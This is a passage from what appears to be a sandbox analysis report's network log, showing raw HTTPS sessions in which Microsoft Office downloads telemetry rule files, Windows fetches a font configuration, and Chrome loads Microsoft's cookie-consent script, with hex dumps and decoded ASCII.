                                                                                                                                                                        Data Ascii: en",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="splice",Dg="toLowerCase
                                                                                                                                                                        2024-11-24 04:12:03 UTC16384INData Raw: 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c 74 29 3a 28 72 3d 31 2c 69 3d 32 30 2c 34 3d 3d 3d 6e 26 26 28
                                                                                                                                                                        Data Ascii: [lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,t):(r=1,i=20,4===n&&(


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        97192.168.2.74982213.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:02 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:02 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1358
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                        ETag: "0x8DC582BE6431446"
                                                                                                                                                                        x-ms-request-id: 87533e62-501e-008f-028c-3a9054000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041202Z-174c587ffdf8fcgwhC1TEBnn7000000003yg00000000t4sc
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:02 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        98192.168.2.749827184.30.17.174443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:02 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                        Range: bytes=0-2147483646
                                                                                                                                                                        User-Agent: Microsoft BITS/7.8
                                                                                                                                                                        Host: fs.microsoft.com
                                                                                                                                                                        2024-11-24 04:12:02 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                        ApiVersion: Distribute 1.1
                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                        X-Azure-Ref: 0SyaoYgAAAACHM3u5nQtYS605XTu+5FyaTE9OMjFFREdFMDIxMgBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                        Cache-Control: public, max-age=192050
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:02 GMT
                                                                                                                                                                        Content-Length: 55
                                                                                                                                                                        Connection: close
                                                                                                                                                                        X-CID: 2
                                                                                                                                                                        2024-11-24 04:12:02 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        99192.168.2.74982113.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:02 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:02 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:02 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1395
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                        ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                        x-ms-request-id: be1d1f49-601e-003d-540f-3e6f25000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041202Z-178bfbc474bpscmfhC1NYCfc2c000000042g000000004u74
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:02 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        100192.168.2.74982413.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:02 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:03 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:02 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1395
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                        ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                        x-ms-request-id: 04c26370-f01e-0003-1e65-3d4453000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041202Z-15b8b599d88wn9hhhC1TEBry0g00000003vg00000000n01r
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:03 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        101192.168.2.74982613.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:02 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:02 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1389
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                        ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                        x-ms-request-id: 7e238ec3-901e-00ac-3dfe-3cb69e000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041202Z-178bfbc474btvfdfhC1NYCa2en00000005n0000000000qxt
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:03 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        102192.168.2.74982513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:02 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:03 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1358
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                        ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                        x-ms-request-id: 16dd49bc-d01e-0066-804e-3cea17000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041203Z-178bfbc474bwlrhlhC1NYCy3kg00000005bg00000000hcc5
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:03 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        103192.168.2.74982313.107.246.634436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:02 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                        Host: wcpstatic.microsoft.com
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                        Referer: https://learn.microsoft.com/
                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                        2024-11-24 04:12:03 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:03 GMT
                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                        Content-Length: 52717
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                        Age: 32789
                                                                                                                                                                        Cache-Control: max-age=43200
                                                                                                                                                                        Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                        Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                        Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                        x-ms-request-id: ae9d672f-401e-00c3-76da-3dd985000000
                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                        x-azure-ref: 20241124T041203Z-178bfbc474b9fdhphC1NYCac0n00000005cg000000007qp1
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:03 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                        Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                        2024-11-24 04:12:03 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                        Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                        2024-11-24 04:12:03 UTC712INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                        Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
                                                                                                                                                                        2024-11-24 04:12:03 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e
                                                                                                                                                                        Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-button
                                                                                                                                                                        2024-11-24 04:12:03 UTC3566INData Raw: 22 2d 22 29 5b 30 5d 3b 6f 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3d 3d 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 63 29 7d 29 29 3b 73 26 26 30 3d 3d 3d 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 22 65 6e 2d 55 53 22 29 2c 6f 2e 70 6c 61 63 65 68 6f 6c 64 65 72 45 6c 65 6d 65 6e 74 3d 6c 2c 72 26 26 6f 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 73 2e 72 65 67 69 73 74 65 72 43 61 6c 6c 62 61 63 6b 28 72 29 2c 6f 2e 73 61 76 65 43 6f 6f 6b 69 65 28 29 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 3d 6e 65 77 20 66 28 21 31 29 2c 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 28 76 6f 69 64 20 30 2c 6f 2e 73 69 74 65 43 6f 6e 73 65 6e 74 29 2c 6f 2e 69 73 49 6e 69 74 52 65 61 64 79 3d 21 30 2c 74 68 69 73 2e 63 6f 6e 73 65 6e 74 43 68 61 6e 67
                                                                                                                                                                        Data Ascii: "-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChang


